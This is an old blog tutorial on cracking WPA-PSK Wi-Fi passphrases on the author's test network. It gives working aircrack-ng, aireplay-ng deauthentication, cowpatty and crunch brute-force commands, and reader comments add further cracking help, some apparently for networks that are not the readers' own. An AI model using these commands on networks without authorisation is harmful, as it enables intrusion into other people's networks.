Tuesday 28 July 2009

Back on Track to Backtrack - WPA cracking

So, after having lived a couple of weeks without my eeepc, I could take it no longer and got myself a new toy.
A Samsung N110, pretty sweet, and actually did go for Windows XP OS, whatever you say about Windows, it is usually handy to have and when needing Linux, I'll just bootup the live USB.

Only small gripe I have is that the bios does now allow booting from SD card which is kinda annoying, but I have a tiny USB 8gig drive, so its OK. Its just that the eeePC seemed to be more versatile out of the box.. oh well, no worries, it works !

When BT4 is finalised I'll probably do a dual boot HDD install, but waiting with that for the moment :)

So anyway, back on track to backtrack ..

In previous posts I looked at wireless and WEP encrypted networks and how especially
the wep networks are dangerously weak.
This all done with BackTrack3 Final.

Important to note the below using BackTrack 4 Pre Final.

Now time to look at WPA and WPA2 protected networks which are normally the ones that
you will see the most.

I have setup a test network using my Asus router as follows ;

essid : default
Encryption : WPA-PSK
No MAC filtering
DHCP enabled

So the point of this is to demonstrate the problems with people using weak passwords for their WPA encrypted connections.

For this example we will use Cowpatty, which is a program made to crack WPA(2) passwords using either rainbow tables or simple wordlists.
Granted this does not catch all, but it can catch the uncautious.

The advantage of using rainbow tables is that it is much faster (when you actually have the tables that is..) just using a wordlist means the program has to combine the essid, with the passphrase, create a hash out of these two and see of it is OK.
Rainbow tables already have these hashes pre-computed, so saving time.

Some rainbow tables have already been made using of the some of the most commonly seen essids, using a 49 million word dictionary for use with Cowpatty; http://www.offensive-security.com/wpa-tables/

So what we need to do is the following
> Identify our target network
> Verify if any clients are associated to network
> If no clients associated.. wait..
> If clients associated, deauth and capture 4-way handshake
> Use this 4-way handshake to with cowpatty to crack network WPA password.

Identifying target

Start our interface in monitor mode and start up airodump, since I know my network will be a WPA network on channel 1, I start airodump with filters for those ;

airmon-ng start wlan0
airodump-ng mon0 -c 1 -t WPA

And then see the target we are looking to attack

So after having identified the network I am after I will re-start airodump identifying the bssid and start monitoring and writing data (in this case using 'default' as filename to write to)and wait for a client to connect.

airodump-ng mon0 -c 1 -t WPA --bssid 00:13:D4:09:32:60 -w default

When the 4-way handshake is captured after the client associates (see top right of the picture below) I no longer need airodump and can continue.

If there is already a client connected to the AP, we need to deauth the client and force it to reconnect, thus giving the 4-way handshake we need.
In a seperate console;
aireplay-ng mon0 -0 5 -a 00:13:D4:09:32:60 -c 00:1F:3C:8C:D9:71

Now we need to have the WPA rainbow table handy for this crack, so use the link above for rainbow tables or make your own..

Start up cowpatty and enter information as necessary.
(All below my specific info, change to suit your needs)

In this case (in cowpatty console);

./cowpatty -d /media/disk/WPA_tables/default.wpa -r ~/default-01.cap -s default

When starting;

When done;

So as you can see from the above pic, the passphrase is butterfly and the program managed to go through over 45000 passwords per second.. pretty good !

Doing the exact same crack, but then just using the dictionary file from which the rainbow tables were made, the situation only changes when starting up cowpatty.
You still need the handshake with the AP and the essid, then proceed as follows;(in my case my wordlist is on the drive-folder /media/disk/WORDLISTS/)

./cowpatty -f /media/disk/WORDLISTS/wpalist.txt -r ~/default-01.cap -s default

I didn't have the patience to let it run its course.. it was only doing 34 passphrases a second and that would have taken a looong time ! However given time and patience.. a lot can be done.
Remember this done on a Samsung N110 with 2gig ram, if the cracking were to be done on a different/better setup, speed would be better.

It is also possible to bruteforce the passphrase using crunch and piping the output through cowpatty.

For instance, there is a telecom provider here that issued a WPA key along with it's router that
was always a combination of numbers and upper case characters up to F of 8 characters in length.

In that case, if we were to feel patient.. we could run crunch using the known variables and pipe the outcome to cowpatty as follows ;

/pentest/passwords/crunch/./crunch 8 8 0123456789ABCDEF | /pentest/wireless/cowpatty/./cowpatty -f - -r ~/capfile.cap -s essid

I can do something similar in my case using buterfly as character set (since I know those are all the characters in the passphrase) and to speed things up fixing the first 5 characters;

/pentest/passwords/crunch/./crunch 9 9 buterfly -t butte@@@@ | /pentest/wireless/cowpatty/./cowpatty -f - -r ~/default-01.cap -s default -v


  1. your blog is really cool man, thanks for all

  2. Thanks ! Much appreciated ;)

  3. bro you are a genius....really awesome work......!!!!
    well i have a few doubts...

    1: how can i send deuth to the other client(i mean the code)..??

    2.how will i know whether i have a 4way handshake..??

    3. how to make rainbow tables with a wordlist.

  4. Hey there, glad you liked the post.

    For your questions 1 & 2, the answers are clearly written in the blog !
    > Use 'aireplay-ng' for the deauthing of a client in order to obtain a 4-way handshake.
    > Use the airodump-ng session for capturing the 4-way handshake, when you have it, it will pop-up on the top right corner of airodump.

    As for vreating your own rainbow tables, look into the tool 'genpmk' in the cowpatty directory.

  5. tape thanks for your reply.....

    as im a beginner to backtrack linux......
    can you provide me with the steps to create rainbow tables with 'genpmk' ?


  6. Heya Daryl,

    The first step is to ensure you have a wordlist which you feel is the right one, lets call ours "wordlist.txt"

    Note the SSID for which you want to create the rainbow table (for instance "default").

    Then fire up backtrack and head over to cowpatty;
    cd /pentest/wireless/cowpatty/

    Start genpmk based on your wordlist and SSID ;
    ./genpmk -f wordlist.txt -d custom-table -s default

    -f for the wordlist you have to use to crack the wpa password
    -d being the output (rainbow table)
    -s being the SSID of your WPA network

    If you would like further info, I could consider a post on it if you like.
    But the above should get you going in the general direction.

    Be aware that it may take some time to generate the rainbow table and it may take up a lot of space,

    And remember, google can be a fantastic aid to nearly all things ;)

  7. thank you very much for your reply, tape....
    it would be better if you make a detailed tutorial on it..!!


  8. I'm my opinion, this is a good information. Good blog, good thinking, no wonder you want to share the information to the public, cause you're genius. I like it very much. If I'm having difficulties about network, can you help me? Please.

  9. where i can find wordlist for wpa/2 or that table you say im from greece and cant find good list... or what if the router have default password? where i find list with default passwards for lot of routers ? plz can you help ? tnx

  10. Hey there,

    well, first use your google-fu... there are many wordlists out there.
    (A quick google for greek wpa2 wordlists proves this..)

    Default passwordlist for routers (as in gateways) try this site ;

    If you are looking for default passwords for router/modem combinations issued by TelComs, then you are out of luck. There is no list for this.

  11. you are genius, thank you very mach for this blog!!!

  12. Glad you like it and thanks for your post ;)

  13. Excellent. Please keep up the great work.


  14. Thanks :) will try to ;)

  15. fantastic blog...I'm learning from the ground up and this is an amazing blog!

  16. Thanks man :)

    Glad you like it and hope your learning goes well !

  17. hello tape,i try this "/pentest/passwords/crunch/./crunch 8 8 0123456789ABCDEF | /pentest/wireless/cowpatty/./cowpatty -f - -r ~/capfile.cap -s essid" end after the progam she seys "no such devices in this file".....if you whant tell my way i put wrong..mayby i need a dictionary?to put..i have wpa handshake end i whant us cowparty to generate a tabel password...for this handsheack..pls tell my what i need to do..thx end respect

  18. The general syntax seems correct enough, are you sure you are using the correct essid ? Of course it must be the essid of your network.

    Also you could try aircrack, remember you are crunching through 36 Gigabytes of data with this command so will take some time.. lols.. at 1000 passphrases a second, around 50 days :)

  19. hello again,it,s somthing wrong in thys comand because is not function...."/pentest/passwords/crunch/./crunch 8 8 0123456789ABCDEF | /pentest/wireless/cowpatty/./cowpatty -f - -r ~/capfile.cap -s essid".for understend you what i need..i tell you,i need a solution without dictionary,i see in youtube menny solution but not function with cowpatty.i have bt5 genome,she is install in my computer,i need install cowpaty or other program...thx for you reply..tell my a solution without dictionary,because i m for greece it,s dificultt to find une dictionary good... bye bye sorry for my english

  20. I repeat.. you are looking at weeks of work to go through that list.. but try this then.

    Make sure you enter the essid correctly and that the path to the .cap file is correct

    /pentest/passwords/crunch/crunch 8 8 0123456789ABCDEF | aircrack-ng -w - -e "Your SSID" /path/to/capfile.cap

    Now prepare yourself to watch paint dry...

    ^[[Aroot@bt:~# /pentest/passwords/crunch/crunch 14 14 0123456789abcdefghklmnopqryzv | aircrack-ng -w - -e PR's KAFFE '/root/era-01.cap'
    > "....i put sumthing wroong or...i must whait...because the program no generate ...sorry for my english i hope you understend my

  22. No, you are not completing the correct syntax, and this does not appear to be any test on your own network.

    No more help on this one.

  23. hy pls help my,i have a problem .i whant CAPTURE "WPA HANDSHAKE" BUT WHEND I INJECTED PACKET DONN'T GIVE MY "WPA HANDSHAKE" WHAY?" this form aireplay-ng -0 6 -a bssid -c mac client mon0....is good she going paket but whay donnt give my wpa handshak? sorry for my english...

  24. i dont have 'cowpatty' directory in '/pentest/wireless' whats worong?

    1. Nothing is wrong, assuming you are using BT5 you can start cowpatty from any directory.

      just type;

  25. TAPE you are my new religion!!!!Thanks for tut's man!!!Respect from Bulgaria!!!


Google Analytics Alternative